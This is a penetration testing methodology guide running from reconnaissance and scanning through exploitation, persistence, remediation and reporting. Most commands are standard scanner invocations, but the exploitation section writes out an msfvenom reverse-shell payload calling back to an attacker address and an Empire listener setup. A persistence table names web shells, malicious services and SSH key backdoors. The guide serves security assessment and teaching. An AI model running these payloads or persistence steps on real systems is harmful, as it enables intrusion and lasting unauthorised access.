Penetration Testing Workflow Overview
Phase 1: Reconnaissance and Information Gathering
Network Infrastructure Analysis
Gathering intelligence about the target infrastructure forms the foundation of any security assessment. Key activities include:
- Deploying Nmap to discover live hosts, open ports, and running services across the target network segment
- Querying WHOIS databases to retrieve domain registration details and authoritative nameservers
- Utilizing DNS enumeration tools like dig and nslookup to resolve hostnames and uncover subdomains
- Mapping network routes using traceroute to understand topology and identify potential choke points
- Assessing host availability and latency characteristics through ICMP echo requests
- Leveraging OSINT platforms such as Shodan and Censys to discover exposed devices and services
- Gathering organizational intelligence through social engineering techniques and public records
Domain Intelligence Collection
WHOIS lookups reveal critical ownership data including registrant details, registration timelines, and contact information. DNS reconnaissance using dig provides deeper insights:
dig example.com ANY +noall +answer
dig axfr @ns1.example.com example.comSubdomain enumeration tools expand the attack surface:
sublist3r -d example.com -o subdomains.txt
amass enum -passive -d example.comPort Scanning Operations
Comprehensive port discovery identifies potential entry vectors. A full TCP SYN scan examines all 65,535 ports:
nmap -sS -Pn -p- --min-rate 1000 192.168.1.100 -oN scan_results.txtSample output interpretation:
Nmap scan report for 192.168.1.100
Host is up (0.00012s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
3306/tcp open mysql
8443/tcp open https-altThe -sS flag initiates a TCP SYN (half-open) scan for speed and stealth, while -p- covers the entire port range.
Operating System Fingerprinting
Determining the target OS guides exploitation strategy. Nmap's OS detection module analyzes TCP/IP stack behavior:
nmap -O --osscan-guess 192.168.1.100Service Enumeration
Service version detection enables targeted vulnerability research:
nmap -sV --version-intensity 5 192.168.1.100Web application fingerprinting with WhatWeb:
whatweb -v https://target-site.comWeb Application Discovery
| Reconnaissance Tool | Primary Function |
|---|---|
| Wappalyzer | Technology stack identification (CMS, frameworks, libraries) |
| Burp Suite Spider | Automated content discovery and site mapping |
| ffuf/gobuster | Directory and file brute-forcing |
| WhatWeb | Web technology fingerprinting |
| theHarvester | Email and subdomain harvesting from public sources |
Phase 2: Vulnerability Assessment
Scanning Tool Selection
Network vulnerability scanners automate the discovery process:
# Nmap with NSE vulnerability scripts
nmap --script vuln -sV 192.168.1.100
# OpenVAS command-line interface
omp -u admin -w password -T 192.168.1.100
# SQLMap for database security testing
sqlmap -u "https://target.com/page?id=1" --batch --dbsWeb application scanners complement network tools:
# Nikto web server scanner
nikto -h https://target-site.com -output scan.html
# OWASP ZAP baseline scan
zap-baseline.py -t https://target-site.comTarget Scope Definition
| Asset Type | Recommended Scanner |
|---|---|
| Web Applications | Burp Suite Professional, OWASP ZAP, Acunetix |
| Network Infrastructure | Nmap, Nessus, OpenVAS |
| Database Servers | SQLMap, SQLNinja |
| Wireless Networks | Aircrack-ng, Kismet, Wifite |
Vulnerability Classification
| Finding | Severity | Business Impact | Remediation Strategy |
|---|---|---|---|
| SQL Injection | Critical | Data exfiltration, authentication bypass | Implement parameterized queries, input validation |
| Cross-Site Scripting | High | Session hijacking, credential theft | Output encoding, Content Security Policy |
| Missing Authentication | Medium | Unauthorized access to functions | Enforce access controls, session management |
| Information Disclosure | Low | Leakage of sensitive metadata | Disable verbose error messages, secure headers |
Vulnerability Validation
Manual verification confirms scanner findings and eliminates false positives:
| Vulnerability Category | Validation Approach |
|---|---|
| SQL Injection | Inject SQL payloads and observe database error responses or time-based delays |
| XSS | Submit JavaScript payloads and verify execution in browser context |
| File Upload | Upload test files with various extensions and content types to bypass filters |
| Path Traversal | Attempt to access files outside web root using encoded sequences |
Phase 3: Exploitation
Attack Tool Arsenal
| Tool | Primary Use Case |
|---|---|
| Metasploit Framework | Exploit development and payload delivery |
| Burp Suite | Web application manipulation and testing |
| Hydra | Credential brute-forcing across protocols |
| John the Ripper | Password hash cracking |
| Netcat | Network communication and reverse shells |
| Wireshark | Traffic analysis and inspection |
Attack Vector Selection
| Methodology | Description |
|---|---|
| Exploitation | Leveraging software vulnerabilities using frameworks like Metasploit |
| Credential Attacks | Password spraying, brute force, or hash cracking |
| Social Engineering | Phishing campaigns and pretexting to obtain credentials |
| Physical Access | Direct hardware interaction or environmental compromise |
Persistence Mechanisms
Establishing persistent access post-exploitation:
# Generate Meterpreter payload with msfvenom
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=10.10.14.5 \
LPORT=4445 \
-f elf -o payload.elf
# Empire framework listener setup
listeners
uselistener http
set Host 10.10.14.5
set Port 8080
execute| Persistence Type | Implementation Method |
|---|---|
| Web Shell | Upload malicious script via file inclusion or RCE |
| Scheduled Task | Create cron job or Windows scheduled task |
| Service Installation | Register malicious service for auto-start |
| SSH Key Persistence | Add public key to authorized_keys |
Phase 4: Remediation and Hardening
Vulnerability Remediation Guidelines
- Create system backups before applying patches or configuration changes
- Prioritize remediation by severity: critical vulnerabilities first, followed by high, medium, and low
- Test patches in staging environments before production deployment
- Verify fixes through regression testing and re-scanning
- Implement continuous monitoring and log analysis
Remediation Tracking
| ID | Finding | Status | Owner | Resolution Date |
|---|---|---|---|---|
| VULN-001 | Authenticated SQL Injection | Resolved | Security Team | 2024-01-15 |
| VULN-002 | Reflected XSS in Search | In Progress | Development | - |
| VULN-003 | Outdated TLS Configuration | Resolved | Operations | 2024-01-18 |
Phase 5: Documentation and Reporting
Report Structure
| Section | Contents |
|---|---|
| Executive Summary | High-level overview of findings and business risk |
| Scope and Methodology | Test boundaries, tools used, and approach |
| Technical Findings | Detailed vulnerability descriptions with evidence |
| Risk Assessment | Impact and likelihood analysis with CVSS scores |
| Recommendations | Prioritized remediation guidance |
| Appendices | Screenshots, logs, and exploit code |
Reporting Standards
- Include clear reproduction steps for each finding
- Provide proof-of-concept code or screenshots
- Assign CVSS scores where applicable
- Reference CVE identifiers for known vulnerabilities
- Offer actionable, specific remediation steps
- Include an impact statement for executive stakeholders